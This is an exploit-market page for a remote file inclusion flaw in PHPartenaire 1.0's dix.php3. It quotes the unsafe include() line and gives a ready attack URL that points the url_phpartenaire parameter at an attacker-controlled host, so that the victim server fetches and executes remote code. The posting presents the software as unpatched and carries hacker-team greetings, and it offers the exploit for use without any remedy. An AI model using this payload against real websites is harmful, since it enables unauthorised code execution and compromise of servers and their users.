[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPartenaire 1.0 (dix.php3) Remote File Include Vulnerability

Author
DaDIsS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-869
Category
web applications
Date add
20-09-2006
Platform
unsorted
=============================================================
PHPartenaire 1.0 (dix.php3) Remote File Include Vulnerability
=============================================================



#===================================================================================#
#
# PHPartenaire => $url_phpartenaire Remote File Inclusion Exploit
#
#===================================================================================#
#
# Softname : PHPartenaire
# Url : http://ograweb.free.fr/phpartenaire/
# Exploit type : Remote File Inclusion.
# Critical: Dangerous.
# Solution Status: Unpatched.
#
#===================================================================================#
#
# By DaDIsS - Member of the Moroccan Hackers Team
#
#===================================================================================#
#
# Exploit Explanation : 
#
#
# The flaw resides in dix.php3 file that contain this code :
# 
# in line 9 :
#
# include($url_phpartenaire."/config.php3");
#
#===================================================================================#
#
# Example : 
#
#
# http://www.victime.com/(path)/dix.php3?url_phpartenaire=http://attacker
#
#
#================================================================#
#
# Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
#
#===================================================================================#
# Proud to be a Moroccan !
#===================================================================================#




#  0day.today [2024-12-24]  #